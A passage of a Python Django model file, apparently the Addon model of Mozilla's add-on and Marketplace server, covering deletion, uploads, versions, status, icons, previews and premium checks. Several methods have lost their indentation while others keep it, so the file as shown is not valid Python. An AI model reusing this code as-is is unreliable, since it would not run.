            type_idx = (idx for idx, f in enumerate(Addon._meta.fields)
                        if f.attname == 'type').next()
            Addon._meta._type_idx = type_idx
        # Fully-positional instantiation (len(args) matches the field count)
        # or keyword instantiation with type=ADDON_WEBAPP.
        if ((len(args) == len(Addon._meta.fields) and
             args[type_idx] == amo.ADDON_WEBAPP) or kw and
            kw.get('type') == amo.ADDON_WEBAPP):
            cls = Webapp
        return object.__new__(cls)
def __unicode__(self):
return u'%s: %s' % (self.id, self.name)
    def __init__(self, *args, **kw):
        super(Addon, self).__init__(*args, **kw)
        # Per-app cache of the first category; filled lazily by get_category()
        # and in bulk by the transformer.
        self._first_category = {}
    def save(self, **kw):
        # Always make sure the slug is valid/unique before writing.
        self.clean_slug()
        super(Addon, self).save(**kw)
    @use_master
    def clean_slug(self, slug_field='slug'):
        # Deleted add-ons keep their slug NULLed out; nothing to clean.
        if self.status == amo.STATUS_DELETED:
            return
        clean_slug(self, slug_field)
@transaction.commit_on_success
def delete(self, msg='', reason=''):
# To avoid a circular import.
from . import tasks
# Check for soft deletion path. Happens only if the addon status isn't
# 0 (STATUS_INCOMPLETE), or when we are in Marketplace.
if self.status == amo.STATUS_DELETED:
# We're already done.
return
id = self.id
# Tell IARC this app is delisted from the set_iarc_storefront_data.
if self.type == amo.ADDON_WEBAPP:
self.set_iarc_storefront_data(disable=True)
# Fetch previews before deleting the addon instance, so that we can
# pass the list of files to delete to the delete_preview_files task
# after the addon is deleted.
previews = list(Preview.objects.filter(addon__id=id)
.values_list('id', flat=True))
log.debug('Deleting add-on: %s' % self.id)
to = [settings.FLIGTAR]
user = amo.get_user()
context = {
'atype': amo.ADDON_TYPE.get(self.type).upper(),
'authors': [u.email for u in self.authors.all()],
'adu': self.average_daily_users,
'guid': self.guid,
'id': self.id,
'msg': msg,
'reason': reason,
'name': self.name,
'slug': self.slug,
'total_downloads': self.total_downloads,
'url': absolutify(self.get_url_path()),
'user_str': ("%s, %s (%s)" % (user.display_name or
user.username, user.email,
user.id) if user else "Unknown"),
}
email_msg = u"""
The following %(atype)s was deleted.
%(atype)s: %(name)s
URL: %(url)s
DELETED BY: %(user_str)s
ID: %(id)s
GUID: %(guid)s
AUTHORS: %(authors)s
TOTAL DOWNLOADS: %(total_downloads)s
AVERAGE DAILY USERS: %(adu)s
NOTES: %(msg)s
REASON GIVEN BY USER FOR DELETION: %(reason)s
""" % context
log.debug('Sending delete email for %(atype)s %(id)s' % context)
subject = 'Deleting %(atype)s %(slug)s (%(id)d)' % context
# Update or NULL out various fields.
models.signals.pre_delete.send(sender=Addon, instance=self)
self.update(status=amo.STATUS_DELETED,
slug=None, app_slug=None, app_domain=None,
_current_version=None)
models.signals.post_delete.send(sender=Addon, instance=self)
send_mail(subject, email_msg, recipient_list=to)
for preview in previews:
tasks.delete_preview_files.delay(preview)
return True
    @classmethod
    def from_upload(cls, upload, platforms, is_packaged=False):
        """Create an Addon (plus its first Version) from a FileUpload.

        Only keys matching actual model fields are copied from the parsed
        upload data. The new add-on starts out as STATUS_NULL (incomplete).
        """
        from files.utils import parse_addon
        data = parse_addon(upload)
        fields = cls._meta.get_all_field_names()
        addon = Addon(**dict((k, v) for k, v in data.items() if k in fields))
        addon.status = amo.STATUS_NULL
        # Keep the parsed default_locale only if it's a locale we support and
        # the upload explicitly declared it.
        locale_is_set = (addon.default_locale and
                         addon.default_locale in (
                             settings.AMO_LANGUAGES +
                             settings.HIDDEN_LANGUAGES) and
                         data.get('default_locale') == addon.default_locale)
        if not locale_is_set:
            addon.default_locale = to_language(translation.get_language())
        if addon.is_webapp():
            addon.is_packaged = is_packaged
            if is_packaged:
                addon.app_domain = data.get('origin')
            else:
                addon.manifest_url = upload.name
                addon.app_domain = addon.domain_from_url(addon.manifest_url)
        addon.save()
        Version.from_upload(upload, addon, platforms)
        amo.log(amo.LOG.CREATE_ADDON, addon)
        log.debug('New addon %r from %r' % (addon, upload))
        return addon
def flush_urls(self):
urls = ['*/addon/%s/' % self.slug, # Doesn't take care of api
'*/addon/%s/developers/' % self.slug,
'*/addon/%s/eula/*' % self.slug,
'*/addon/%s/privacy/' % self.slug,
'*/addon/%s/versions/*' % self.slug,
'*/api/*/addon/%s' % self.slug,
self.icon_url,
self.thumbnail_url,
]
urls.extend('*/user/%d/' % u.id for u in self.listed_authors)
return urls
    def get_url_path(self, more=False, add_prefix=True):
        """Frontend detail-page URL for this add-on."""
        # If more=True you get the link to the ajax'd middle chunk of the
        # detail page.
        view = 'addons.detail_more' if more else 'addons.detail'
        return reverse(view, args=[self.slug], add_prefix=add_prefix)
    def get_api_url(self):
        # Used by Piston in output.
        return absolutify(self.get_url_path())
    def get_dev_url(self, action='edit', args=None, prefix_only=False):
        """Developer-hub URL for this add-on or app."""
        # Either link to the "new" Marketplace Developer Hub or the old one.
        args = args or []
        prefix = 'mkt.developers'
        if self.is_webapp():
            view_name = '%s.%s' if prefix_only else '%s.apps.%s'
            return reverse(view_name % (prefix, action),
                           args=[self.app_slug] + args)
        else:
            type_ = 'addons'
            if not prefix_only:
                prefix += '.%s' % type_
            view_name = '{prefix}.{action}'.format(prefix=prefix,
                                                   action=action)
            return reverse(view_name, args=[self.slug] + args)
    def get_detail_url(self, action='detail', args=[]):
        # NOTE(review): mutable default `args` -- it's never mutated here,
        # but callers shouldn't rely on that.
        if self.is_webapp():
            return reverse('apps.%s' % action, args=[self.app_slug] + args)
        else:
            return reverse('addons.%s' % action, args=[self.slug] + args)
    def meet_the_dev_url(self):
        # "Meet the developer" page URL.
        return reverse('addons.meet', args=[self.slug])
    def type_url(self):
        """The url for this add-on's AddonType."""
        return AddonType(self.type).get_url_path()
    @amo.cached_property(writable=True)
    def listed_authors(self):
        # Authors flagged as "listed", in their configured display order.
        # writable=True lets attach_listed_authors() pre-fill this in bulk.
        return UserProfile.objects.filter(
            addons=self,
            addonuser__listed=True).order_by('addonuser__position')
    @classmethod
    def get_fallback(cls):
        # Field providing the fallback locale for translated fields.
        return cls._meta.get_field('default_locale')
    @property
    def reviews(self):
        # Top-level reviews only (replies have reply_to set).
        return Review.objects.filter(addon=self, reply_to=None)
def get_category(self, app):
if app in getattr(self, '_first_category', {}):
return self._first_category[app]
categories = list(self.categories.filter(application=app))
return categories[0] if categories else None
    def language_ascii(self):
        # Human-readable name of the default locale, or None if unknown.
        lang = translation.to_language(self.default_locale)
        return settings.LANGUAGES.get(lang)
    @property
    def valid_file_statuses(self):
        """File statuses considered 'valid' given the add-on's own status."""
        if self.status == amo.STATUS_PUBLIC:
            return [amo.STATUS_PUBLIC]
        if self.status == amo.STATUS_PUBLIC_WAITING:
            # For public_waiting apps, accept both public and
            # public_waiting statuses, because the file status might be
            # changed from PUBLIC_WAITING to PUBLIC just before the app's
            # is.
            return amo.WEBAPPS_APPROVED_STATUSES
        if self.status in (amo.STATUS_LITE,
                           amo.STATUS_LITE_AND_NOMINATED):
            return [amo.STATUS_PUBLIC, amo.STATUS_LITE,
                    amo.STATUS_LITE_AND_NOMINATED]
        return amo.VALID_STATUSES
    def get_version(self, backup_version=False):
        """
        Retrieves the latest public version of an addon.

        backup_version: if specified the highest file up to but *not*
        including this version will be found. Returns None when no version
        qualifies.
        """
        try:
            status = self.valid_file_statuses
            status_list = ','.join(map(str, status))
            fltr = {'files__status__in': status}
            if backup_version:
                # Restrict to Firefox versions below the backup cutoff.
                fltr['apps__application__id'] = amo.FIREFOX.id
                fltr['apps__min__version_int__lt'] = amo.FIREFOX.backup_version
            # The NOT EXISTS subquery rejects any version that has at least
            # one file whose status is outside `status`, i.e. *all* of a
            # version's files must be valid.
            return self.versions.no_cache().filter(**fltr).extra(
                where=["""
                    NOT EXISTS (
                        SELECT 1 FROM versions as v2
                        INNER JOIN files AS f2 ON (f2.version_id = v2.id)
                        WHERE v2.id = versions.id
                        AND f2.status NOT IN (%s))
                """ % status_list])[0]
        except (IndexError, Version.DoesNotExist):
            return None
    @write
    def update_version(self, ignore=None, _signal=True):
        """
        Returns true if we updated the field.

        The optional ``ignore`` parameter, if present, is a version
        to not consider as part of the update, since it may be in the
        process of being deleted.

        Pass ``_signal=False`` if you want no signals fired at all.
        """
        backup = None
        current = self.get_version()
        if current:
            # Only keep a backup pointer when the current version's Firefox
            # minimum is above the backup cutoff.
            firefox_min = current.compatible_apps.get(amo.FIREFOX)
            if (firefox_min and
                firefox_min.min.version_int > amo.FIREFOX.backup_version):
                backup = self.get_version(backup_version=True)
        try:
            # Latest is the newest non-beta version (optionally skipping
            # the one being deleted).
            latest_qs = self.versions.exclude(files__status=amo.STATUS_BETA)
            if ignore is not None:
                latest_qs = latest_qs.exclude(pk=ignore.pk)
            latest = latest_qs.latest()
        except Version.DoesNotExist:
            latest = None
        latest_id = latest and latest.id
        # `diff` collects old/new pairs purely for logging below.
        diff = [self._backup_version, backup, self._current_version, current]
        # Sometimes the DB is in an inconsistent state when this
        # signal is dispatched.
        try:
            if self._latest_version:
                # Make sure stringifying this does not trigger
                # Version.DoesNotExist before trying to use it for
                # logging.
                unicode(self._latest_version)
            diff += [self._latest_version, latest]
        except Version.DoesNotExist:
            diff += [self._latest_version_id, latest_id]
        updated = {}
        send_signal = False
        if self._backup_version != backup:
            updated.update({'_backup_version': backup})
            send_signal = True
        if self._current_version != current:
            updated.update({'_current_version': current})
            send_signal = True
        # Don't use self.latest_version here. It may throw Version.DoesNotExist
        # if we're called from a post_delete signal. We also don't set
        # send_signal since we only want this fired if the public version
        # changes.
        if self._latest_version_id != latest_id:
            updated.update({'_latest_version': latest})
        # update_version can be called by a post_delete signal (such
        # as File's) when deleting a version. If so, we should avoid putting
        # that version-being-deleted in any fields.
        if ignore is not None:
            updated = dict([(k, v)
                            for (k, v) in updated.iteritems() if v != ignore])
        if updated:
            # Pass along _signal to the .update() to prevent it from firing
            # signals if we don't want them.
            updated['_signal'] = _signal
            try:
                self.update(**updated)
                if send_signal and _signal:
                    signals.version_changed.send(sender=self)
                log.info(u'Version changed from backup: %s to %s, '
                         u'current: %s to %s, latest: %s to %s for addon %s'
                         % tuple(diff + [self]))
            except Exception, e:
                log.error(u'Could not save version changes backup: %s to %s, '
                          u'current: %s to %s, latest: %s to %s '
                          u'for addon %s (%s)'
                          % tuple(diff + [self, e]))
        return bool(updated)
    @property
    def current_version(self):
        """Returns the current_version or None if the app is deleted or not
        created yet"""
        if not self.id or self.status == amo.STATUS_DELETED:
            return None
        try:
            return self._current_version
        except ObjectDoesNotExist:
            # FK points at a missing row; treat as "no current version".
            pass
        return None
    @property
    def latest_version(self):
        """Returns the latest_version or None if the app is deleted or not
        created yet"""
        if not self.id or self.status == amo.STATUS_DELETED:
            return None
        try:
            return self._latest_version
        except ObjectDoesNotExist:
            # FK points at a missing row; treat as "no latest version".
            pass
        return None
    @property
    def backup_version(self):
        """Returns the backup version."""
        # Only meaningful when there is a current version at all.
        if not self.current_version:
            return
        return self._backup_version
def get_icon_dir(self):
return os.path.join(settings.ADDON_ICONS_PATH,
'%s' % (self.id / 1000))
    def get_icon_url(self, size, use_default=True):
        """
        Returns the addon's icon url for the given size.

        If there is no icon for the addon then if:
            use_default is True, will return a default icon
            use_default is False, will return None
        """
        icon_type_split = []
        if self.icon_type:
            icon_type_split = self.icon_type.split('/')
        # Get the closest allowed size without going over
        if (size not in amo.ADDON_ICON_SIZES
                and size >= amo.ADDON_ICON_SIZES[0]):
            size = [s for s in amo.ADDON_ICON_SIZES if s < size][-1]
        elif size < amo.ADDON_ICON_SIZES[0]:
            size = amo.ADDON_ICON_SIZES[0]
        # Figure out what to return for an image URL
        if not self.icon_type:
            if not use_default:
                return None
            return '%s/%s-%s.png' % (settings.ADDON_ICONS_DEFAULT_URL,
                                     'default', size)
        elif icon_type_split[0] == 'icon':
            # Pre-defined gallery icon (icon_type looks like "icon/<name>").
            return '%s/%s-%s.png' % (settings.ADDON_ICONS_DEFAULT_URL,
                                     icon_type_split[1], size)
        else:
            # [1] is the whole ID, [2] is the directory
            split_id = re.match(r'((\d*?)\d{1,3})$', str(self.id))
            # If we don't have the icon_hash, and we are dealing with a Webapp,
            # it's fine, set to a dummy string ("never"), when the icon is
            # eventually changed, icon_hash will be updated. For regular Addons
            # we rely on the modified instead like we always have.
            if self.type == amo.ADDON_WEBAPP:
                suffix = getattr(self, 'icon_hash', None) or 'never'
            else:
                # Cache-bust with the last-modified timestamp.
                suffix = int(time.mktime(self.modified.timetuple()))
            return settings.ADDON_ICON_URL % (
                split_id.group(2) or 0, self.id, size, suffix)
    @write
    def update_status(self):
        """Recompute `status` from this add-on's versions/files.

        No-op for deleted/incomplete/disabled add-ons and for webapps.
        """
        if (self.status in [amo.STATUS_NULL, amo.STATUS_DELETED]
            or self.is_disabled or self.is_webapp()):
            return
        def logit(reason, old=self.status):
            # `old` is bound at definition time, i.e. before any update below
            # changes self.status -- that's deliberate.
            log.info('Changing add-on status [%s]: %s => %s (%s).'
                     % (self.id, old, self.status, reason))
            amo.log(amo.LOG.CHANGE_STATUS, self.get_status_display(), self)
        versions = self.versions.all()
        if not versions.exists():
            self.update(status=amo.STATUS_NULL)
            logit('no versions')
        elif not (versions.filter(files__isnull=False).exists()):
            self.update(status=amo.STATUS_NULL)
            logit('no versions with files')
        elif (self.status == amo.STATUS_PUBLIC and
              not versions.filter(files__status=amo.STATUS_PUBLIC).exists()):
            # Public add-on with no public files left: downgrade.
            if versions.filter(files__status=amo.STATUS_LITE).exists():
                self.update(status=amo.STATUS_LITE)
                logit('only lite files')
            else:
                self.update(status=amo.STATUS_UNREVIEWED)
                logit('no reviewed files')
    @staticmethod
    def attach_related_versions(addons, addon_dict=None):
        """Attach _current/_backup/_latest Version objects in one query."""
        if addon_dict is None:
            addon_dict = dict((a.id, a) for a in addons)
        current_ids = filter(None, (a._current_version_id for a in addons))
        latest_ids = filter(None, (a._latest_version_id for a in addons))
        backup_ids = filter(None, (a._backup_version_id for a in addons))
        all_ids = set(current_ids) | set(backup_ids) | set(latest_ids)
        versions = list(Version.objects.filter(id__in=all_ids).order_by())
        for version in versions:
            try:
                addon = addon_dict[version.addon_id]
            except KeyError:
                log.debug('Version %s has an invalid add-on id.' % version.id)
                continue
            if addon._current_version_id == version.id:
                addon._current_version = version
            if addon._backup_version_id == version.id:
                addon._backup_version = version
            if addon._latest_version_id == version.id:
                addon._latest_version = version
            # Avoid a later DB hit when the version needs its addon.
            version.addon = addon
    @staticmethod
    def attach_listed_authors(addons, addon_dict=None):
        """Attach ordered `listed_authors` lists in bulk."""
        if addon_dict is None:
            addon_dict = dict((a.id, a) for a in addons)
        q = (UserProfile.objects.no_cache()
             .filter(addons__in=addons, addonuser__listed=True)
             .extra(select={'addon_id': 'addons_users.addon_id',
                            'position': 'addons_users.position'}))
        # itertools.groupby requires its input sorted by the grouping key.
        q = sorted(q, key=lambda u: (u.addon_id, u.position))
        for addon_id, users in itertools.groupby(q, key=lambda u: u.addon_id):
            addon_dict[addon_id].listed_authors = list(users)
        # FIXME: set listed_authors to empty list on addons without listed
        # authors.
    @staticmethod
    def attach_previews(addons, addon_dict=None, no_transforms=False):
        """Attach sorted `all_previews` lists in bulk."""
        if addon_dict is None:
            addon_dict = dict((a.id, a) for a in addons)
        qs = Preview.objects.filter(addon__in=addons,
                                    position__gte=0).order_by()
        if no_transforms:
            qs = qs.no_transforms()
        # itertools.groupby requires its input sorted by the grouping key.
        qs = sorted(qs, key=lambda x: (x.addon_id, x.position, x.created))
        for addon, previews in itertools.groupby(qs, lambda x: x.addon_id):
            addon_dict[addon].all_previews = list(previews)
        # FIXME: set all_previews to empty list on addons without previews.
    @staticmethod
    def attach_prices(addons, addon_dict=None):
        """Attach `_premium` (AddonPremium with its Price) in bulk."""
        # FIXME: merge with attach_prices transformer below.
        if addon_dict is None:
            addon_dict = dict((a.id, a) for a in addons)
        # There's a constrained amount of price tiers, may as well load
        # them all and let cache machine keep them cached.
        prices = dict((p.id, p) for p in Price.objects.all())
        # Attach premium addons.
        qs = AddonPremium.objects.filter(addon__in=addons)
        premium_dict = dict((ap.addon_id, ap) for ap in qs)
        # Attach premiums to addons, making sure to attach None to free addons
        # or addons where the corresponding AddonPremium is missing.
        for addon in addons:
            if addon.is_premium():
                addon_p = premium_dict.get(addon.id)
                if addon_p:
                    price = prices.get(addon_p.price_id)
                    if price:
                        addon_p.price = price
                    addon_p.addon = addon
                addon._premium = addon_p
            else:
                addon._premium = None
    @staticmethod
    @timer
    def transformer(addons):
        """Queryset transform: bulk-attach related data to a list of Addons.

        Returns the {id: addon} dict, or None for an empty input.
        """
        if not addons:
            return
        addon_dict = dict((a.id, a) for a in addons)
        # Personas skip the heavy attachment work below.
        addons = [a for a in addons if a.type != amo.ADDON_PERSONA]
        # Set _backup_version, _latest_version, _current_version
        Addon.attach_related_versions(addons, addon_dict=addon_dict)
        # Attach listed authors.
        Addon.attach_listed_authors(addons, addon_dict=addon_dict)
        # Attach previews.
        Addon.attach_previews(addons, addon_dict=addon_dict)
        # Attach _first_category for Firefox.
        cats = dict(AddonCategory.objects.values_list('addon', 'category')
                    .filter(addon__in=addon_dict,
                            category__application=amo.FIREFOX.id))
        qs = Category.objects.filter(id__in=set(cats.values()))
        categories = dict((c.id, c) for c in qs)
        for addon in addons:
            category = categories[cats[addon.id]] if addon.id in cats else None
            addon._first_category[amo.FIREFOX.id] = category
        # Attach prices.
        Addon.attach_prices(addons, addon_dict=addon_dict)
        return addon_dict
    @property
    def show_beta(self):
        # Only public add-ons that actually have a beta channel advertise it.
        return self.status == amo.STATUS_PUBLIC and self.current_beta_version
def show_adu(self):
return self.type not in (amo.ADDON_SEARCH, amo.ADDON_WEBAPP)
    @amo.cached_property
    def current_beta_version(self):
        """Retrieves the latest version of an addon, in the beta channel."""
        versions = self.versions.filter(files__status=amo.STATUS_BETA)[:1]
        if versions:
            return versions[0]
    @property
    def icon_url(self):
        # Default listing-size icon.
        return self.get_icon_url(32)
    def authors_other_addons(self, app=None):
        """
        Return other addons by the author(s) of this addon,
        optionally takes an app.
        """
        if app:
            qs = Addon.objects.listed(app)
        else:
            qs = Addon.objects.valid()
        # Webapps are excluded; only listed authorships count.
        return (qs.exclude(id=self.id)
                .exclude(type=amo.ADDON_WEBAPP)
                .filter(addonuser__listed=True,
                        authors__in=self.listed_authors)
                .distinct())
@property
def contribution_url(self, lang=settings.LANGUAGE_CODE,
app=settings.DEFAULT_APP):
return reverse('addons.contribute', args=[self.slug])
    @property
    def thumbnail_url(self):
        """
        Returns the addon's thumbnail url or a default.
        """
        try:
            preview = self.all_previews[0]
            return preview.thumbnail_url
        except IndexError:
            # No previews: fall back to the placeholder image.
            # NOTE(review): if MEDIA_URL ends with '/', this produces a
            # double slash -- confirm against settings.
            return settings.MEDIA_URL + '/img/icons/no-preview.png'
    def can_request_review(self):
        """Return the tuple of statuses an add-on can request (maybe empty)."""
        # Nothing to review if there are no files at all.
        if not File.objects.filter(version__addon=self):
            return ()
        if (self.is_disabled or
            self.status in (amo.STATUS_PUBLIC,
                            amo.STATUS_LITE_AND_NOMINATED,
                            amo.STATUS_DELETED) or
            not self.latest_version or
            not self.latest_version.files.exclude(status=amo.STATUS_DISABLED)):
            return ()
        elif self.status == amo.STATUS_NOMINATED:
            return (amo.STATUS_LITE,)
        elif self.status == amo.STATUS_UNREVIEWED:
            return (amo.STATUS_PUBLIC,)
        elif self.status == amo.STATUS_LITE:
            if self.days_until_full_nomination() == 0:
                return (amo.STATUS_PUBLIC,)
            else:
                # Still in preliminary waiting period...
                return ()
        else:
            return (amo.STATUS_LITE, amo.STATUS_PUBLIC)
    def days_until_full_nomination(self):
        """Returns number of days until author can request full review.

        If wait period is over or this doesn't apply at all, returns 0 days.
        An author must wait 10 days after submitting first LITE approval
        to request FULL.
        """
        if self.status != amo.STATUS_LITE:
            return 0
        # Calculate wait time from the earliest submitted version:
        qs = (File.objects.filter(version__addon=self, status=self.status)
              .order_by('created').values_list('datestatuschanged'))[:1]
        if qs:
            # `days_ago` is a timedelta since the file's status change.
            days_ago = datetime.now() - qs[0][0]
            if days_ago < timedelta(days=10):
                return 10 - days_ago.days
        return 0
    def is_webapp(self):
        # True for marketplace apps (rows instantiated as Webapp).
        return self.type == amo.ADDON_WEBAPP
    @property
    def is_disabled(self):
        """True if this Addon is disabled.

        It could be disabled by an admin or disabled by the developer
        """
        return self.status == amo.STATUS_DISABLED or self.disabled_by_user
    @property
    def is_deleted(self):
        # Soft-deleted (see delete() above).
        return self.status == amo.STATUS_DELETED
    @property
    def is_under_review(self):
        return self.status in amo.STATUS_UNDER_REVIEW
    def is_unreviewed(self):
        return self.status in amo.UNREVIEWED_STATUSES
    def is_public(self):
        # Public and not hidden by its developer.
        return self.status == amo.STATUS_PUBLIC and not self.disabled_by_user
    def is_public_waiting(self):
        return self.status == amo.STATUS_PUBLIC_WAITING
    def is_incomplete(self):
        return self.status == amo.STATUS_NULL
    def is_pending(self):
        return self.status == amo.STATUS_PENDING
    def is_rejected(self):
        return self.status == amo.STATUS_REJECTED
    def can_become_premium(self):
        """
        Not all addons can become premium and those that can only at
        certain times. Webapps can become premium at any time.
        """
        # An add-on that is upsold to can't itself become premium.
        if self.upsell:
            return False
        if self.type == amo.ADDON_WEBAPP and not self.is_premium():
            return True
        return (self.status in amo.PREMIUM_STATUSES
                and self.highest_status in amo.PREMIUM_STATUSES
                and self.type in amo.ADDON_BECOME_PREMIUM)

    def is_premium(self):
        """
        If the addon is premium. Will include addons that are premium
        and have a price of zero. Primarily of use in the devhub to determine
        if an app is intending to be premium.
        """
        return self.premium_type in amo.ADDON_PREMIUMS

    def is_free(self):
        """
        This is the opposite of is_premium. Will not include apps that have a
        price of zero. Primarily of use in the devhub to determine if an app is
        intending to be free.
        """
        return not (self.is_premium() and self.premium and
                    self.premium.price)

    def is_free_inapp(self):
        """True if free but offering in-app payments."""
        return self.premium_type == amo.ADDON_FREE_INAPP

    def needs_payment(self):
        """True unless entirely free or using external in-app payments."""
        return (self.premium_type not in
                (amo.ADDON_FREE, amo.ADDON_OTHER_INAPP))
    def can_be_deleted(self):
        """True unless already deleted (deletion is not idempotent here)."""
        return not self.is_deleted

    @classmethod
    def featured_random(cls, app, lang):
        """Return featured add-on ids for this app/language (random order)."""
        return get_featured_ids(app, lang)

    def is_featured(self, app, lang=None):
        """Is add-on globally featured for this app and language?"""
        # NOTE(review): returns None (falsy) when app is not given — TODO
        # confirm callers only rely on truthiness.
        if app:
            return self.id in get_featured_ids(app, lang)

    def has_full_profile(self):
        """Is developer profile public (completed)?"""
        return self.the_reason and self.the_future

    def has_profile(self):
        """Is developer profile (partially or entirely) completed?"""
        return self.the_reason or self.the_future
    @amo.cached_property
    def tags_partitioned_by_developer(self):
        """Returns a tuple of developer tags and user tags for this addon."""
        tags = self.tags.not_blacklisted()
        user_tags = tags.exclude(addon_tags__user__in=self.listed_authors)
        dev_tags = tags.exclude(id__in=[t.id for t in user_tags])
        return dev_tags, user_tags

    @amo.cached_property
    def compatible_apps(self):
        """Shortcut to get compatible apps for the current version."""
        # Search providers and personas don't list their supported apps.
        if self.type in amo.NO_COMPAT:
            return dict((app, None) for app in
                        amo.APP_TYPE_SUPPORT[self.type])
        if self.current_version:
            return self.current_version.compatible_apps
        else:
            return {}

    def accepts_compatible_apps(self):
        """True if this add-on lists compatible apps."""
        return self.type not in amo.NO_COMPAT

    def incompatible_latest_apps(self):
        """Returns a list of applications with which this add-on is
        incompatible (based on the latest version).
        """
        return [a for a, v in self.compatible_apps.items() if v and
                version_int(v.max.version) < version_int(a.latest_version)]
def has_author(self, user, roles=None):
"""True if ``user`` is an author with any of the specified ``roles``.
``roles`` should be a list of valid roles (see amo.AUTHOR_ROLE_*). If
not specified, has_author will return true if the user has any role.
"""
if user is None or user.is_anonymous():
return False
if roles is None:
roles = dict(amo.AUTHOR_CHOICES).keys()
return AddonUser.objects.filter(addon=self, user=user,
role__in=roles).exists()
    @property
    def takes_contributions(self):
        """True if public, opted into contributions, and has a payee set."""
        return (self.status == amo.STATUS_PUBLIC and self.wants_contributions
                and (self.paypal_id or self.charity_id))

    @property
    def has_eula(self):
        # Returns the EULA translation object itself (truthy when present).
        return self.eula

    @classmethod
    def _last_updated_queries(cls):
        """
        Get the queries used to calculate addon.last_updated.
        """
        status_change = Max('versions__files__datestatuschanged')
        # Fully-reviewed add-ons: last status change of their public files.
        public = (
            Addon.objects.no_cache().filter(
                status=amo.STATUS_PUBLIC,
                versions__files__status=amo.STATUS_PUBLIC)
            .exclude(type__in=(amo.ADDON_PERSONA, amo.ADDON_WEBAPP))
            .values('id').annotate(last_updated=status_change))
        # Preliminarily-reviewed add-ons keyed off their LITE files.
        lite = (
            Addon.objects.no_cache().filter(
                status__in=amo.LISTED_STATUSES,
                versions__files__status=amo.STATUS_LITE)
            .exclude(type=amo.ADDON_WEBAPP)
            .values('id').annotate(last_updated=status_change))
        # Everything else (the catch-all): newest file creation date.
        stati = amo.LISTED_STATUSES + (amo.STATUS_PUBLIC,)
        exp = (Addon.objects.no_cache().exclude(status__in=stati)
               .filter(versions__files__status__in=amo.VALID_STATUSES)
               .exclude(type=amo.ADDON_WEBAPP)
               .values('id')
               .annotate(last_updated=Max('versions__files__created')))
        # Web apps: newest public version's creation date.
        webapps = (Addon.objects.no_cache()
                   .filter(type=amo.ADDON_WEBAPP,
                           status=amo.STATUS_PUBLIC,
                           versions__files__status=amo.STATUS_PUBLIC)
                   .values('id')
                   .annotate(last_updated=Max('versions__created')))
        return dict(public=public, exp=exp, lite=lite, webapps=webapps)
    @amo.cached_property(writable=True)
    def all_categories(self):
        """All categories, cached (writable so transformers can pre-fill)."""
        return list(self.categories.all())

    @amo.cached_property(writable=True)
    def all_previews(self):
        """All non-promo previews, cached (writable for transformers)."""
        return list(self.get_previews())

    def get_previews(self):
        """Exclude promo graphics."""
        return self.previews.exclude(position=-1)

    @property
    def app_categories(self):
        """Categories grouped per application as (app, [categories]) pairs."""
        categories = sorted_groupby(order_by_translation(self.categories.all(),
                                                         'name'),
                                    key=lambda x: x.application_id)
        app_cats = []
        for app_id, cats in categories:
            app = amo.APP_IDS.get(app_id)
            if app_id and not app:
                # Skip retired applications like Sunbird.
                continue
            app_cats.append((app, list(cats)))
        return app_cats
def remove_locale(self, locale):
"""NULLify strings in this locale for the add-on and versions."""
for o in itertools.chain([self], self.versions.all()):
Translation.objects.remove_for(o, locale)
    def get_localepicker(self):
        """For language packs, gets the contents of localepicker."""
        # Only public language packs with a current version have one.
        if (self.type == amo.ADDON_LPAPP and self.status == amo.STATUS_PUBLIC
                and self.current_version):
            files = (self.current_version.files
                     .filter(platform__in=amo.MOBILE_PLATFORMS.keys()))
            try:
                return unicode(files[0].get_localepicker(), 'utf-8')
            except IndexError:
                pass
        return ''

    def get_mozilla_contacts(self):
        """Split the comma-separated mozilla_contact field into a list."""
        # NOTE(review): yields [''] when mozilla_contact is empty — TODO
        # confirm callers tolerate that.
        return [x.strip() for x in self.mozilla_contact.split(',')]
    @amo.cached_property
    def upsell(self):
        """Return the upsell or add-on, or None if there isn't one."""
        try:
            # We set unique_together on the model, so there will only be one.
            return self._upsell_from.all()[0]
        except IndexError:
            pass

    @amo.cached_property
    def upsold(self):
        """
        Return what this is going to upsold from,
        or None if there isn't one.
        """
        try:
            return self._upsell_to.all()[0]
        except IndexError:
            pass

    def get_purchase_type(self, user):
        """Return the user's purchase record type, or None if never bought."""
        if user and isinstance(user, UserProfile):
            try:
                return self.addonpurchase_set.get(user=user).type
            except models.ObjectDoesNotExist:
                pass

    def has_purchased(self, user):
        """True if the user completed a purchase of this add-on."""
        return self.get_purchase_type(user) == amo.CONTRIB_PURCHASE

    def is_refunded(self, user):
        """True if the user's purchase was refunded."""
        return self.get_purchase_type(user) == amo.CONTRIB_REFUND

    def is_chargeback(self, user):
        """True if the user's purchase ended in a chargeback."""
        return self.get_purchase_type(user) == amo.CONTRIB_CHARGEBACK
def can_review(self, user):
if user and self.has_author(user):
return False
else:
return (not self.is_premium() or self.has_purchased(user) or
self.is_refunded(user))
    @property
    def premium(self):
        """
        Returns the premium object which will be gotten by the transformer,
        if its not there, try and get it. Will return None if there's nothing
        there.
        """
        # Lazily cached on the instance to avoid repeated DB hits.
        if not hasattr(self, '_premium'):
            try:
                self._premium = self.addonpremium
            except AddonPremium.DoesNotExist:
                self._premium = None
        return self._premium

    @property
    def all_dependencies(self):
        """Return all the add-ons this add-on depends on."""
        # Capped at 3 dependencies.
        return list(self.dependencies.all()[:3])

    def has_installed(self, user):
        """True if ``user`` has an Installed record for this add-on."""
        if not user or not isinstance(user, UserProfile):
            return False
        return self.installed.filter(user=user).exists()
def get_latest_file(self):
"""Get the latest file from the current version."""
cur = self.current_version
if cur:
res = cur.files.order_by('-created')
if res:
return res[0]
@property
def uses_flash(self):
"""
Convenience property until more sophisticated per-version
checking is done for packaged apps.
"""
f = self.get_latest_file()
if not f:
return False
return f.uses_flash
    def in_escalation_queue(self):
        """True if this add-on has been escalated to senior reviewers."""
        return self.escalationqueue_set.exists()

    def in_rereview_queue(self):
        # Rereview is part of marketplace and not AMO, so setting for False
        # to avoid having to catch NotImplemented errors.
        return False

    def sign_if_packaged(self, version_pk, reviewer=False):
        # Only meaningful for webapps; the Webapp subclass overrides this.
        raise NotImplementedError('Not available for add-ons.')
    def update_names(self, new_names):
        """
        Adds, edits, or removes names to match the passed in new_names dict.
        Will not remove the translation of the default_locale.

        `new_names` is a dictionary mapping of locales to names.

        Returns a message that can be used in logs showing what names were
        added or updated.

        Note: This method doesn't save the changes made to the addon object.
        Don't forget to call save() in your calling method.
        """
        updated_locales = {}
        # Existing name translations, keyed by locale.
        locales = dict(Translation.objects.filter(id=self.name_id)
                                          .values_list('locale',
                                                       'localized_string'))
